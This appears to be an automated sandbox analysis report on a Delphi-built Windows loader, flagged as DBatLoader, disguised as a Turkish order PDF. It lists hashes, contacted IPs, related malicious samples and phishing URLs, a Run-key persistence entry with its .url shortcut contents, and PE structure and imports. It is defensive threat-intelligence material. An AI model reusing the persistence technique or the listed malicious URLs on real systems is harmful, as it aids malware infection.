                                • Excluded domains from analysis (whitelisted): www.bing.com, fs.microsoft.com, asf-ris-prod-neu-azsc.northeurope.cloudapp.azure.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, arc.msn.com, ris.api.iris.microsoft.com, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, store-images.s-microsoft.com, login.live.com, sls.update.microsoft.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
• Execution Graph export aborted for target Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe, PID 6356 because there are no executed functions
• Not all processes were analyzed, report is missing behavior information
                                • Report creation exceeded maximum time and may have missing disassembly code information.
                                • Report size exceeded maximum capacity and may have missing behavior information.
                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                • Report size getting too big, too many NtQueryValueKey calls found.
Time | Type | Description
09:42:46 | API Interceptor | 1x Sleep call for process: Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe modified
09:42:55 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Eluiezilfw C:\Users\Public\Libraries\wflizeiulE.url
09:43:05 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Eluiezilfw C:\Users\Public\Libraries\wflizeiulE.url
09:43:07 | API Interceptor | 2x Sleep call for process: Eluiezilfw.exe modified
                                • 172.66.43.115
                                Nitro Gen 6.6v.exeGet hashmaliciousBrowse
                                • 162.159.128.233
                                MV SEA CREDENCE_VENDOR-TEMPLATE_FORM.exeGet hashmaliciousBrowse
                                • 104.21.65.246
                                Cnxsc.exeGet hashmaliciousBrowse
                                • 162.159.134.233
                                5Qg0FFYoQd.exeGet hashmaliciousBrowse
                                • 188.114.97.3
                                DHL-27-6-2022.pdf.exeGet hashmaliciousBrowse
                                • 172.67.154.72
                                https://kmctcoeemergingtechnology.org/vldGet hashmaliciousBrowse
                                • 104.18.11.207
                                Invoice.htmlGet hashmaliciousBrowse
                                • 104.17.25.14
                                https://www.namaraclarkebetheldkb.com/Get hashmaliciousBrowse
                                • 104.17.25.14
                                New Europe RFQ & Samples for June-2022_Purchase_0622.exeGet hashmaliciousBrowse
                                • 162.159.134.233
                                DHL_Shipping Documents_pdf_98567.exeGet hashmaliciousBrowse
                                • 104.17.104.76
                                DOC_CRISTINA _ 24TH_JUNE_2022 _.HTMLGet hashmaliciousBrowse
                                • 104.18.7.145
                                854F1E97-5DBB-4A87-A566-33D9012B05E2 pdf.exeGet hashmaliciousBrowse
                                • 162.159.135.233
                                tka30O3OZN.exeGet hashmaliciousBrowse
                                • 188.114.96.3
                                WKD-ASIEjnepbRxO8J.exeGet hashmaliciousBrowse
                                • 37.0.8.61
                                K0s6WyVPOi.exeGet hashmaliciousBrowse
                                • 37.0.8.39
                                ZbbyBoNRDc.exeGet hashmaliciousBrowse
                                • 37.0.11.164
                                1bS6sdYO4P.exeGet hashmaliciousBrowse
                                • 37.0.8.39
                                TG7K9h4o8V.exeGet hashmaliciousBrowse
                                • 37.0.8.39
                                SecuriteInfo.com.Variant.Zusy.427341.31777.exeGet hashmaliciousBrowse
                                • 37.0.14.195
                                SecuriteInfo.com.W32.AIDetectNet.01.17891.exeGet hashmaliciousBrowse
                                • 37.0.8.144
                                FAKTURA.exeGet hashmaliciousBrowse
                                • 37.0.14.205
                                INVOICE01.exeGet hashmaliciousBrowse
                                • 37.0.14.211
                                mSqzcglwLg.exeGet hashmaliciousBrowse
                                • 37.0.8.61
                                Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exeGet hashmaliciousBrowse
                                • 37.0.14.195
                                SecuriteInfo.com.Variant.Zusy.427341.3668.exeGet hashmaliciousBrowse
                                • 37.0.14.195
                                C0xM3H9W6k.exeGet hashmaliciousBrowse
                                • 37.0.11.237
                                ETBOdBrV1t.exeGet hashmaliciousBrowse
                                • 37.0.8.39
                                CTA047372374723727727273.JPG.exeGet hashmaliciousBrowse
                                • 37.0.11.237
                                New948947878403.exeGet hashmaliciousBrowse
                                • 37.0.14.216
                                INVOICE-No338199.exeGet hashmaliciousBrowse
                                • 37.0.10.141
                                YI52XpVV6Y.exeGet hashmaliciousBrowse
                                • 37.0.8.98
                                b1JqtInfZH.exeGet hashmaliciousBrowse
                                • 37.0.11.164
                                B7DBqrRaFM.exeGet hashmaliciousBrowse
                                • 37.0.11.227
                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                37f463bf4616ecd445d4a1937da06e192022-06-24_0837.xlsGet hashmaliciousBrowse
                                • 162.159.130.233
                                • 162.159.133.233
                                • 162.159.134.233
                                https://huhgul.com/Get hashmaliciousBrowse
                                • 162.159.130.233
                                • 162.159.133.233
                                • 162.159.134.233
                                #U70b9#U51fb#U5b89#U88c5-#U7eb8#U98de#U673a#U7b80#U4f53#U4e2d#U6587#U8bed#U8a00#U5305.exeGet hashmaliciousBrowse
                                • 162.159.130.233
                                • 162.159.133.233
                                • 162.159.134.233
                                eVoucher.jsGet hashmaliciousBrowse
                                • 162.159.130.233
                                • 162.159.133.233
                                • 162.159.134.233
                                PCehpIwZ3F.exeGet hashmaliciousBrowse
                                • 162.159.130.233
                                • 162.159.133.233
                                • 162.159.134.233
                                ziMhCvj0xz.exeGet hashmaliciousBrowse
                                • 162.159.130.233
                                • 162.159.133.233
                                • 162.159.134.233
                                reportphishinginvestors_76.htmGet hashmaliciousBrowse
                                • 162.159.130.233
                                • 162.159.133.233
                                • 162.159.134.233
                                https://kmctcoeemergingtechnology.org/vldGet hashmaliciousBrowse
                                • 162.159.130.233
                                • 162.159.133.233
                                • 162.159.134.233
                                Invoice.htmlGet hashmaliciousBrowse
                                • 162.159.130.233
                                • 162.159.133.233
                                • 162.159.134.233
                                #U260e#Ufe0f message 8340041.htmGet hashmaliciousBrowse
                                • 162.159.130.233
                                • 162.159.133.233
                                • 162.159.134.233
                                https://www.namaraclarkebetheldkb.com/Get hashmaliciousBrowse
                                • 162.159.130.233
                                • 162.159.133.233
                                • 162.159.134.233
                                FACTURA#FFC64209##FLL#Z0026368#10238360##02-05-2022#24-06-2022.exeGet hashmaliciousBrowse
                                • 162.159.130.233
                                • 162.159.133.233
                                • 162.159.134.233
                                DHL_Shipping Documents_pdf_98567.exeGet hashmaliciousBrowse
                                • 162.159.130.233
                                • 162.159.133.233
                                • 162.159.134.233
                                #U260e#Ufe0f message 60951000.htmGet hashmaliciousBrowse
                                • 162.159.130.233
                                • 162.159.133.233
                                • 162.159.134.233
                                DOC_CRISTINA _ 24TH_JUNE_2022 _.HTMLGet hashmaliciousBrowse
                                • 162.159.130.233
                                • 162.159.133.233
                                • 162.159.134.233
                                w9AJD6nRbD.exeGet hashmaliciousBrowse
                                • 162.159.130.233
                                • 162.159.133.233
                                • 162.159.134.233
                                http://comicsninja.ninja/Get hashmaliciousBrowse
                                • 162.159.130.233
                                • 162.159.133.233
                                • 162.159.134.233
                                https://drive.google.com/file/d/1DxAR4CZ0I3LkRutdy96_RlWfNODG9HBW/view?usp=sharingGet hashmaliciousBrowse
                                • 162.159.130.233
                                • 162.159.133.233
                                • 162.159.134.233
                                ATT19158.htmGet hashmaliciousBrowse
                                • 162.159.130.233
                                • 162.159.133.233
                                • 162.159.134.233
                                http://u.to/pHYyHAGet hashmaliciousBrowse
                                • 162.159.130.233
                                • 162.159.133.233
                                • 162.159.134.233
                                No context
                                Process:C:\Users\user\Desktop\Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe
                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):901632
                                Entropy (8bit):6.877204437689639
                                Encrypted:false
                                SSDEEP:12288:VFAa/jmra7RB+8VL4sckZIRDrtQXLgL7f/Bm+vym2/r3Ayd3soZdKYcSwuY:jV6rk1VL4oIRD6bgXXtvHy1XKly
                                MD5:8E60C68E832622B0EBD88A612898A9F9
                                SHA1:99C8A0DB1608B7F3FE783829F13A6A594554F142
                                SHA-256:6F4628DB14DDCFF78F5B0AD2C62F6791E4B29901EB9EF8A3686A2B7019308A99
                                SHA-512:96DE1DEABDA27BB5B24676D9CBB667B15779A166388FC71C345A11C66A521997244FD0DEDADFCD3BE73F2E3302B0C90F77231907690590D1F3D8107B0F0E9541
                                Malicious:true
                                Yara Hits:
                                • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: C:\Users\Public\Libraries\Eluiezilfw.exe, Author: Joe Security
                                Antivirus:
                                • Antivirus: ReversingLabs, Detection: 22%
                                Reputation:low
                                Process:C:\Users\user\Desktop\Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):26
                                Entropy (8bit):3.95006375643621
                                Encrypted:false
                                SSDEEP:3:ggPYV:rPYV
                                MD5:187F488E27DB4AF347237FE461A079AD
                                SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                Malicious:true
                                Reputation:high, very likely benign file
                                Preview:[ZoneTransfer]....ZoneId=0
                                Process:C:\Users\user\Desktop\Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe
                                File Type:MS Windows 95 Internet shortcut text (URL=<file:"C:\\Users\\Public\\Libraries\\Eluiezilfw.exe">), ASCII text, with CRLF line terminators
                                Category:modified
                                Size (bytes):103
                                Entropy (8bit):5.011960120240937
                                Encrypted:false
                                SSDEEP:3:HRAbABGQYmTWAX+rSF55i0XM3tJHysGKd8V+K+qvn:HRYFVmTWDyzUtJHysbTK+Un
                                MD5:D16E6F915215004FD953F38105469F43
                                SHA1:CA05489EF9AFCE552299CE05CB029C069C584FC9
                                SHA-256:1C8419346F48517D46B9281EAD00F10D55E2BBC8B3EC2B9B25FA45ADC61D8827
                                SHA-512:D89168D4CFC4E29E7585B31C3F926F9973D98EC47B15F9660AAD33C6A39D458F0D07A18A0C8C83602D4BFE04651D20AB473D69CF760D5EF28276FC8FA651C588
                                Malicious:false
                                Yara Hits:
                                • Rule: Methodology_Shortcut_HotKey, Description: Detects possible shortcut usage for .URL persistence, Source: C:\Users\Public\Libraries\wflizeiulE.url, Author: @itsreallynick (Nick Carr)
                                • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: C:\Users\Public\Libraries\wflizeiulE.url, Author: @itsreallynick (Nick Carr)
                                Reputation:low
                                Preview:[InternetShortcut]..URL=file:"C:\\Users\\Public\\Libraries\\Eluiezilfw.exe"..IconIndex=40..HotKey=878..
                                Process:C:\Users\user\Desktop\Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):279040
                                Entropy (8bit):7.595146817608574
                                Encrypted:false
                                SSDEEP:6144:5Htw4G6ymcP6lLkahkaaHTEFBYt+mzZGTxIM9d70gXf8lxBy1q:/6dzHTKBYtXZ26gdogK8q
                                MD5:7D74AF495B07AAD93486870343B767E3
                                SHA1:32123E362E845DDE988E09A5A4309172C9762201
                                SHA-256:152076F0A4EAEDD3FFDC4022C8E0F5850F9B2DEFFFFCBFE1E2B720096CF9600D
                                SHA-512:28BC9AD9021A9B0D38F03BF8D424813CB00DFE85AA272C3C38345A7FC78C6E8A905D90F5D2DA6019CE3E7A1F129F4633127C26BF8EC0710311866725899BEDD6
                                Malicious:false
                                Reputation:low
                                Process:C:\Users\Public\Libraries\Eluiezilfw.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):279040
                                Entropy (8bit):7.595146817608574
                                Encrypted:false
                                SSDEEP:6144:5Htw4G6ymcP6lLkahkaaHTEFBYt+mzZGTxIM9d70gXf8lxBy1q:/6dzHTKBYtXZ26gdogK8q
                                MD5:7D74AF495B07AAD93486870343B767E3
                                SHA1:32123E362E845DDE988E09A5A4309172C9762201
                                SHA-256:152076F0A4EAEDD3FFDC4022C8E0F5850F9B2DEFFFFCBFE1E2B720096CF9600D
                                SHA-512:28BC9AD9021A9B0D38F03BF8D424813CB00DFE85AA272C3C38345A7FC78C6E8A905D90F5D2DA6019CE3E7A1F129F4633127C26BF8EC0710311866725899BEDD6
                                Malicious:false
                                File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                Entropy (8bit):6.877204437689639
                                TrID:
                                • Win32 Executable (generic) a (10002005/4) 99.81%
                                • Windows Screen Saver (13104/52) 0.13%
                                • Win16/32 Executable Delphi generic (2074/23) 0.02%
                                • Generic Win/DOS Executable (2004/3) 0.02%
                                • DOS Executable Generic (2002/1) 0.02%
                                File name:Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe
                                File size:901632
                                MD5:8e60c68e832622b0ebd88a612898a9f9
                                SHA1:99c8a0db1608b7f3fe783829f13a6a594554f142
                                SHA256:6f4628db14ddcff78f5b0ad2c62f6791e4b29901eb9ef8a3686a2b7019308a99
                                SHA512:96de1deabda27bb5b24676d9cbb667b15779a166388fc71c345a11c66a521997244fd0dedadfcd3be73f2e3302b0c90f77231907690590d1f3d8107b0f0e9541
                                SSDEEP:12288:VFAa/jmra7RB+8VL4sckZIRDrtQXLgL7f/Bm+vym2/r3Ayd3soZdKYcSwuY:jV6rk1VL4oIRD6bgXXtvHy1XKly
                                TLSH:FB159E25F6C04437C5F21D755C4BA2A59837BF112E2CAC866BE53E4D3F3AA81382D297
                                Icon Hash:74e08889828b84d4
                                Entrypoint:0x4a3a58
                                Entrypoint Section:.itext
                                Digitally signed:false
                                Imagebase:0x400000
                                Subsystem:windows gui
                                Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                                DLL Characteristics:
                                Time Stamp:0x2A425E19 [Fri Jun 19 22:22:17 1992 UTC]
                                TLS Callbacks:
                                CLR (.Net) Version:
                                OS Version Major:4
                                OS Version Minor:0
                                File Version Major:4
                                File Version Minor:0
                                Subsystem Version Major:4
                                Subsystem Version Minor:0
                                Import Hash:5280055d457e9ca268949d0a6c7d827a
                                Instruction
                                push ebp
                                mov ebp, esp
                                add esp, FFFFFFF0h
                                mov eax, 004A1F80h
                                call 00007F953C66CF31h
                                nop
                                nop
                                nop
                                nop
                                nop
                                nop
                                nop
                                nop
                                mov eax, dword ptr [004A6A60h]
                                mov eax, dword ptr [eax]
                                call 00007F953C6CD89Dh
                                mov ecx, dword ptr [004A6C00h]
                                mov eax, dword ptr [004A6A60h]
                                mov eax, dword ptr [eax]
                                mov edx, dword ptr [004A1ADCh]
                                call 00007F953C6CD89Dh
                                mov eax, dword ptr [004A6A60h]
                                mov eax, dword ptr [eax]
                                mov byte ptr [eax+5Bh], 00000000h
                                mov eax, dword ptr [004A6A60h]
                                mov eax, dword ptr [eax]
                                call 00007F953C6CD906h
                                call 00007F953C66AA8Dh
                                 Name | Virtual Address | Virtual Size | Is in Section
                                 IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                                 IMAGE_DIRECTORY_ENTRY_IMPORT | 0xab000 | 0x2c80 | .idata
                                 IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xba000 | 0x2a13c | .rsrc
                                 IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                                 IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                                 IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xb0000 | 0x9d78 | .reloc
                                 IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                                 IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                 IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                 IMAGE_DIRECTORY_ENTRY_TLS | 0xaf000 | 0x18 | .rdata
                                 IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                                 IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                 IMAGE_DIRECTORY_ENTRY_IAT | 0xab84c | 0x6e4 | .idata
                                 IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                                 IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                                 IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                                 Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                 .text | 0x1000 | 0xa1288 | 0xa1400 | False | 0.5252316497093024 | data | 6.580947017578751 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                 .itext | 0xa3000 | 0xab0 | 0xc00 | False | 0.556640625 | data | 5.90726865777267 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                 .data | 0xa4000 | 0x2c44 | 0x2e00 | False | 0.4107506793478261 | data | 4.2710329018780255 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                 .bss | 0xa7000 | 0x38d8 | 0x0 | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                 .idata | 0xab000 | 0x2c80 | 0x2e00 | False | 0.31326426630434784 | data | 5.123456156924204 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                 .tls | 0xae000 | 0x40 | 0x0 | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                 .rdata | 0xaf000 | 0x18 | 0x200 | False | 0.05078125 | data | 0.2044881574398449 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                 .reloc | 0xb0000 | 0x9d78 | 0x9e00 | False | 0.5820065268987342 | data | 6.661487991041825 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                 .rsrc | 0xba000 | 0x2a13c | 0x2a200 | False | 0.42494088464391694 | data | 6.66870756771348 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country
AUDIO | 0xbabe8 | 0x21944 | RIFF (little-endian) data, WAVE audio, Microsoft ADPCM, mono 22050 Hz | English | United States
RT_CURSOR | 0xdc52c | 0x134 | data | English | United States
RT_CURSOR | 0xdc660 | 0x134 | data | English | United States
RT_CURSOR | 0xdc794 | 0x134 | data | English | United States
RT_CURSOR | 0xdc8c8 | 0x134 | data | English | United States
RT_CURSOR | 0xdc9fc | 0x134 | data | English | United States
RT_CURSOR | 0xdcb30 | 0x134 | data | English | United States
RT_CURSOR | 0xdcc64 | 0x134 | data | English | United States
RT_BITMAP | 0xdcd98 | 0x1d0 | data | English | United States
RT_BITMAP | 0xdcf68 | 0x1e4 | data | English | United States
RT_BITMAP | 0xdd14c | 0x1d0 | data | English | United States
RT_BITMAP | 0xdd31c | 0x1d0 | data | English | United States
RT_BITMAP | 0xdd4ec | 0x1d0 | data | English | United States
RT_BITMAP | 0xdd6bc | 0x1d0 | data | English | United States
RT_BITMAP | 0xdd88c | 0x1d0 | data | English | United States
RT_BITMAP | 0xdda5c | 0x1d0 | data | English | United States
RT_BITMAP | 0xddc2c | 0x1d0 | data | English | United States
RT_BITMAP | 0xdddfc | 0x1d0 | data | English | United States
RT_BITMAP | 0xddfcc | 0xe8 | GLS_BINARY_LSB_FIRST | English | United States
RT_ICON | 0xde0b4 | 0x1200 | data | |
RT_ICON | 0xdf2b4 | 0xa00 | data | |
RT_ICON | 0xdfcb4 | 0x600 | GLS_BINARY_LSB_FIRST | |
RT_DIALOG | 0xe02b4 | 0x52 | data | |
RT_DIALOG | 0xe0308 | 0x52 | data | |
RT_STRING | 0xe035c | 0xd8 | data | |
RT_STRING | 0xe0434 | 0x450 | data | |
RT_STRING | 0xe0884 | 0x53c | data | |
RT_STRING | 0xe0dc0 | 0x2ac | data | |
RT_STRING | 0xe106c | 0xc8 | data | |
RT_STRING | 0xe1134 | 0x108 | data | |
RT_STRING | 0xe123c | 0x2a8 | data | |
RT_STRING | 0xe14e4 | 0x3e8 | data | |
RT_STRING | 0xe18cc | 0x390 | data | |
RT_STRING | 0xe1c5c | 0x370 | data | |
RT_STRING | 0xe1fcc | 0x390 | data | |
RT_STRING | 0xe235c | 0xd0 | data | |
RT_STRING | 0xe242c | 0xa0 | data | |
RT_STRING | 0xe24cc | 0x2b8 | data | |
RT_STRING | 0xe2784 | 0x474 | data | |
RT_STRING | 0xe2bf8 | 0x38c | data | |
RT_STRING | 0xe2f84 | 0x2b4 | data | |
RT_RCDATA | 0xe3238 | 0x10 | data | |
RT_RCDATA | 0xe3248 | 0x2d8 | data | |
RT_RCDATA | 0xe3520 | 0xb5e | Delphi compiled form 'T__691934005' | |
RT_GROUP_CURSOR | 0xe4080 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States
RT_GROUP_CURSOR | 0xe4094 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States
RT_GROUP_CURSOR | 0xe40a8 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States
RT_GROUP_CURSOR | 0xe40bc | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States
RT_GROUP_CURSOR | 0xe40d0 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States
RT_GROUP_CURSOR | 0xe40e4 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States
RT_GROUP_CURSOR | 0xe40f8 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States
RT_GROUP_ICON | 0xe410c | 0x30 | data | |
DLL | Import
oleaut32.dll | SysFreeString, SysReAllocStringLen, SysAllocStringLen
advapi32.dll | RegQueryValueExA, RegOpenKeyExA, RegCloseKey
user32.dll | GetKeyboardType, DestroyWindow, LoadStringA, MessageBoxA, CharNextA
kernel32.dll | GetACP, Sleep, VirtualFree, VirtualAlloc, GetCurrentThreadId, InterlockedDecrement, InterlockedIncrement, VirtualQuery, WideCharToMultiByte, MultiByteToWideChar, lstrlenA, lstrcpynA, LoadLibraryExA, GetThreadLocale, GetStartupInfoA, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetCommandLineA, FreeLibrary, FindFirstFileA, FindClose, ExitProcess, CompareStringA, WriteFile, UnhandledExceptionFilter, RtlUnwind, RaiseException, GetStdHandle
kernel32.dll | TlsSetValue, TlsGetValue, LocalAlloc, GetModuleHandleA
user32.dll | CreateWindowExA, WindowFromPoint, WaitMessage, UpdateWindow, UnregisterClassA, UnhookWindowsHookEx, TranslateMessage, TranslateMDISysAccel, TrackPopupMenu, SystemParametersInfoA, ShowWindow, ShowScrollBar, ShowOwnedPopups, ShowCaret, SetWindowsHookExA, SetWindowPos, SetWindowPlacement, SetWindowLongW, SetWindowLongA, SetTimer, SetScrollRange, SetScrollPos, SetScrollInfo, SetRect, SetPropA, SetParent, SetMenuItemInfoA, SetMenu, SetForegroundWindow, SetFocus, SetCursor, SetClipboardData, SetClassLongA, SetCapture, SetActiveWindow, SendMessageW, SendMessageA, ScrollWindow, ScreenToClient, RemovePropA, RemoveMenu, ReleaseDC, ReleaseCapture, RegisterWindowMessageA, RegisterClipboardFormatA, RegisterClassA, RedrawWindow, PtInRect, PostQuitMessage, PostMessageA, PeekMessageW, PeekMessageA, OpenClipboard, OffsetRect, OemToCharA, NotifyWinEvent, MessageBoxA, MessageBeep, MapWindowPoints, MapVirtualKeyA, LoadStringA, LoadKeyboardLayoutA, LoadIconA, LoadCursorA, LoadBitmapA, KillTimer, IsZoomed, IsWindowVisible, IsWindowUnicode, IsWindowEnabled, IsWindow, IsRectEmpty, IsIconic, IsDialogMessageW, IsDialogMessageA, IsChild, InvalidateRect, IntersectRect, InsertMenuItemA, InsertMenuA, InflateRect, HideCaret, GetWindowThreadProcessId, GetWindowTextA, GetWindowRect, GetWindowPlacement, GetWindowLongW, GetWindowLongA, GetWindowDC, GetTopWindow, GetSystemMetrics, GetSystemMenu, GetSysColorBrush, GetSysColor, GetSubMenu, GetScrollRange, GetScrollPos, GetScrollInfo, GetPropA, GetParent, GetWindow, GetMessageTime, GetMessagePos, GetMenuStringA, GetMenuState, GetMenuItemInfoA, GetMenuItemID, GetMenuItemCount, GetMenu, GetLastActivePopup, GetKeyboardState, GetKeyboardLayoutNameA, GetKeyboardLayoutList, GetKeyboardLayout, GetKeyState, GetKeyNameTextA, GetIconInfo, GetForegroundWindow, GetFocus, GetDesktopWindow, GetDCEx, GetDC, GetCursorPos, GetCursor, GetClipboardData, GetClientRect, GetClassLongA, GetClassInfoA, GetCapture, GetActiveWindow, FrameRect, FindWindowA, FillRect, EqualRect, EnumWindows, EnumThreadWindows, EnumChildWindows, EndPaint, EnableWindow, EnableScrollBar, EnableMenuItem, EmptyClipboard, DrawTextA, DrawStateA, DrawMenuBar, DrawIconEx, DrawIcon, DrawFrameControl, DrawEdge, DispatchMessageW, DispatchMessageA, DestroyWindow, DestroyMenu, DestroyIcon, DestroyCursor, DeleteMenu, DefWindowProcA, DefMDIChildProcA, DefFrameProcA, CreatePopupMenu, CreateMenu, CreateIcon, CloseClipboard, ClientToScreen, CheckMenuItem, CharNextW, CallWindowProcA, CallNextHookEx, BeginPaint, CharNextA, CharLowerBuffA, CharLowerA, CharUpperBuffA, CharToOemA, AdjustWindowRectEx, ActivateKeyboardLayout
gdi32.dll | UnrealizeObject, StretchBlt, SetWindowOrgEx, SetWinMetaFileBits, SetViewportOrgEx, SetTextColor, SetStretchBltMode, SetROP2, SetPixel, SetMapMode, SetEnhMetaFileBits, SetDIBColorTable, SetBrushOrgEx, SetBkMode, SetBkColor, SelectPalette, SelectObject, SelectClipRgn, SaveDC, RestoreDC, Rectangle, RectVisible, RealizePalette, Polyline, Polygon, PlayEnhMetaFile, PatBlt, MoveToEx, MaskBlt, LineTo, LPtoDP, IntersectClipRect, GetWindowOrgEx, GetWinMetaFileBits, GetTextMetricsA, GetTextExtentPointA, GetTextExtentPoint32A, GetSystemPaletteEntries, GetStockObject, GetRgnBox, GetPixel, GetPaletteEntries, GetObjectA, GetEnhMetaFilePaletteEntries, GetEnhMetaFileHeader, GetEnhMetaFileDescriptionA, GetEnhMetaFileBits, GetDeviceCaps, GetDIBits, GetDIBColorTable, GetDCOrgEx, GetCurrentPositionEx, GetClipBox, GetBrushOrgEx, GetBitmapBits, GdiFlush, ExcludeClipRect, DeleteObject, DeleteEnhMetaFile, DeleteDC, CreateSolidBrush, CreatePenIndirect, CreatePalette, CreateHalftonePalette, CreateFontIndirectA, CreateEnhMetaFileA, CreateDIBitmap, CreateDIBSection, CreateCompatibleDC, CreateCompatibleBitmap, CreateBrushIndirect, CreateBitmap, CopyEnhMetaFileA, CloseEnhMetaFile, BitBlt
version.dll | VerQueryValueA, GetFileVersionInfoSizeA, GetFileVersionInfoA
kernel32.dll | lstrcpyA, WriteFile, WaitForSingleObject, VirtualQuery, VirtualProtect, VirtualAlloc, SizeofResource, SetThreadLocale, SetFilePointer, SetEvent, SetErrorMode, SetEndOfFile, ResetEvent, ReadFile, OpenProcess, MultiByteToWideChar, MulDiv, LockResource, LoadResource, LoadLibraryA, LeaveCriticalSection, InitializeCriticalSection, GlobalUnlock, GlobalSize, GlobalLock, GlobalFree, GlobalFindAtomA, GlobalDeleteAtom, GlobalAlloc, GlobalAddAtomA, GetVersionExA, GetVersion, GetUserDefaultLCID, GetTickCount, GetThreadLocale, GetStdHandle, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetLocalTime, GetLastError, GetFullPathNameA, GetFileAttributesA, GetDiskFreeSpaceA, GetDateFormatA, GetCurrentThreadId, GetCurrentProcessId, GetCurrentProcess, GetComputerNameA, GetCPInfo, FreeResource, InterlockedExchange, FreeLibrary, FormatMessageA, FlushInstructionCache, FindResourceA, FindAtomW, EnumCalendarInfoA, EnterCriticalSection, DeleteFileA, DeleteCriticalSection, CreateThread, CreateFileA, CreateEventA, CompareStringA, CloseHandle
advapi32.dll | RegQueryValueExA, RegOpenKeyExA, RegFlushKey, RegCloseKey
oleaut32.dll | GetErrorInfo, GetActiveObject, VariantInit, SysFreeString
ole32.dll | CreateStreamOnHGlobal, IsAccelerator, OleDraw, OleSetMenuDescriptor, CoTaskMemFree, ProgIDFromCLSID, StringFromCLSID, CoCreateInstance, CoGetClassObject, CoUninitialize, CoInitialize, IsEqualGUID
kernel32.dll | Sleep
oleaut32.dll | SafeArrayPtrOfIndex, SafeArrayPutElement, SafeArrayGetElement, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayGetUBound, SafeArrayGetLBound, SafeArrayCreate, VariantChangeType, VariantCopyInd, VariantCopy, VariantClear, VariantInit
